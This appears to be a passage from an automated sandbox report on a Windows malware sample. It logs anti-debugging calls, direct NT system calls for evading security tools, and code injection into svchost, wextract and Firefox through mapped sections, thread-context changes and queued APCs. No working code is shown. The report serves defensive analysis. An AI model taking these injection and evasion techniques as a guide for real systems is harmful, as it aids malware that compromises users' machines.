Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]	2_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]	2_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]	2_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]	2_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]	2_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]	2_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228B50 mov eax, dword ptr fs:[00000030h]	2_2_03228B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]	2_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]	2_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]	2_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]	2_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]	2_2_0326CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]	2_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]	2_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]	2_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]	2_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]	2_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]	2_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]	2_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]	2_2_032C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]	2_2_032BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]	2_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]	2_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304940 mov eax, dword ptr fs:[00000030h]	2_2_03304940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]	2_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]	2_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]	2_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]	2_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_004238DA

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0041F250 SetUnhandledExceptionFilter,	0_2_0041F250
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041A208
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\wextract.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: NULL target: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: NULL target: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\wextract.exe

Thread register set: target process: 1548

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\wextract.exe

Thread APC queued: target process: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe

Writes to foreign memory regions

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

